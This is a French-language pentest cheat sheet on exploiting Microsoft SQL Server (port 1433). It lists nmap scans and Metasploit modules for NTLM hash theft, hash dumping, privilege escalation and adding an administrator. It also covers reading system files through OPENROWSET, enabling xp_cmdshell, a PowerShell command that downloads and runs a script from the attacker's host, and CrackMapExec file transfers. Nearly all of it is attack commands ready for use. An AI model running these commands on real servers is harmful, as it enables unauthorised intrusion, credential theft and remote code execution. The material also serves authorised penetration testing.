🔢MS-SQL - port 1433
Techniques d'exploitation des services Microsoft SQL Server
Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Modules metasploit
Attention: Nécessite des identifiants.
#Vol de NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Execution de code
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload
#Ajouter un nouvel administrateur depuis une session meterpreter
msf> use windows/manage/mssql_local_auth_bypass
Connexion
Depuis machine linux
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
Depuis une machine Windows
Télécharger SSMS (SQL Server Management Studio)
https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms
Lire des fichiers internes
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Exécution de code
Vérification
> xp_cmdshell `whoami`;
> go
Activer xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell `whoami`;
> go
Forcer l'activation
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Téléchargement de fichier
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go
Avec CrackMapExec
#Téléchargement
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path
#Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
Dernière mise à jour
Cet article vous a-t-il été utile ?